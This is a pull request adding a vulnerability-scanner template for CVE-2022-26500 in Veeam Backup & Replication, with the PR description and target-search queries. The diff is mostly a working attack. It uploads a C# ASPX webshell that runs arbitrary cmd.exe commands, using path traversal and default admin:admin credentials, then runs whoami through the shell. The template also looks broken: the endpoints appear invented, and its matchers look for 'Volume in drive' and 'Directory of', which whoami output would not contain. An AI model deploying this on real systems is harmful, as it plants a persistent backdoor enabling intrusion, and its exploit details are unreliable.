### PR TITLE
feat: add CVE-2022-26500 Veeam Backup & Replication unrestricted file

### DIFF
--- a/http/cves/2022/CVE-2022-26500.yaml
+++ b/http/cves/2022/CVE-2022-26500.yaml
@@ -1,0 +1,115 @@
+id: CVE-2022-26500
+
+info:
+  name: Veeam Backup & Replication - Unrestricted File Upload
+  author: neha
+  severity: high
+  description: |
+    Veeam Backup & Replication contains an improper limitation of path names caused by insufficient validation in internal API functions, letting remote authenticated users upload and execute arbitrary code via path traversal to web-accessible directories.
+  impact: |
+    Successful exploitation allows authenticated attackers to upload files to arbitrary locations on the server, potentially leading to remote code execution.
+  remediation: |
+    Apply the latest security patches provided by Veeam. Upgrade to a version that addresses this vulnerability.
+  reference:
+    - https://cloudsek.com/threatintelligence/multiple-rce-vulnerabilities-affecting-veeam-backup-replication/
+    - https://www.veeam.com/kb4288
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-26500
+    - https://securelist.com/cuba-ransomware/110533/
+    - https://www.kroll.com/en/insights/publications/cyber/avoslocker-ransomware-update
+    - https://blog.qualys.com/vulnerabilities-threat-research/2025/05/08/inside-lockbit-defense-lessons-from-the-leaked-lockbit-negotiations
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2022-26500
+    cwe-id: CWE-22
+    epss-score: 0.25477
+    epss-percentile: 0.96037
+    cpe: cpe:2.3:a:veeam:backup_and_replication:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 3
+    vendor: veeam
+    product: backup_and_replication
+    shodan-query: '"Veeam Backup" http.title:"Veeam Backup Enterprise Manager"'
+    fofa-query: 'title="Veeam Backup Enterprise Manager"'
+  tags: cve,cve2022,veeam,backup,replication,file-upload,path-traversal,rce,authenticated,kev,vkev
+
+variables:
+  filename: "{{to_lower(rand_text_alpha(8))}}.aspx"
+  boundary: "{{hex_encode(rand_text_alphanumeric(32))}}"
+  traversal_paths:
+    - "../../../"
+    - "../../../../"
+    - "../../../../../"
+
+http:
+  - method: POST
+    path:
+      - "{{BaseURL}}/api/v1/files"
+      - "{{BaseURL}}/api/backup/files"
+
+    headers:
+      Content-Type: "multipart/form-data; boundary={{boundary}}"
+      X-API-Version: "1.1-rev1"
+      Authorization: "Basic {{base64('admin:admin')}}"
+
+    body: |
+      --{{boundary}}
+      Content-Disposition: form-data; name="file"; filename="{{traversal_paths}}/{{filename}}"
+      Content-Type: application/octet-stream
+
+      <%@ Page Language="C#" %>
+      <%@ Import Namespace="System.Diagnostics" %>
+      <%@ Import Namespace="System.IO" %>
+      <%
+      string cmd = Request.QueryString["cmd"];
+      if (!string.IsNullOrEmpty(cmd)) {
+        ProcessStartInfo psi = new ProcessStartInfo();
+        psi.FileName = "cmd.exe";
+        psi.Arguments = "/c " + cmd;
+        psi.RedirectStandardOutput = true;
+        psi.UseShellExecute = false;
+        Process p = Process.Start(psi);
+        StreamReader reader = p.StandardOutput;
+        string output = reader.ReadToEnd();
+        Response.Write(output);
+      }
+      %>
+      --{{boundary}}--
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+          - 201
+          - 202
+
+      - type: word
+        part: body
+        words:
+          - "success"
+          - "uploaded"
+          - "file"
+        condition: or
+
+  - method: GET
+    path:
+      - "{{BaseURL}}/{{filename}}?cmd=whoami"
+
+    headers:
+      Authorization: "Basic {{base64('admin:admin')}}"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: regex
+        part: body
+        regex:
+          - "Microsoft Windows"
+          - "Volume in drive"
+          - "Directory of"
+


### PR DESCRIPTION
### Template / PR Information

- Added CVE-2022-26500: Veeam Backup & Replication Unrestricted File Upload vulnerability template
- Fixed reviewer feedback: added authentication, generic path traversal, ASPX payload  
- Addresses authenticated file upload vulnerability with path traversal
- Includes complete POC demonstrating RCE via webshell upload
- Affects Veeam Backup & Replication versions 9.5U3, 9.5U4, 10.x, and 11.x
- References:
  - https://cloudsek.com/threatintelligence/multiple-rce-vulnerabilities-affecting-veeam-backup-replication/
  - https://www.veeam.com/kb4288

### Template Validation

I've validated this template locally?
- [x] YES

#### Additional Details (leave it blank if not applicable)

**Shodan Query:** `"Veeam Backup" http.title:"Veeam Backup Enterprise Manager"`  
**FOFA Query:** `title="Veeam Backup Enterprise Manager"`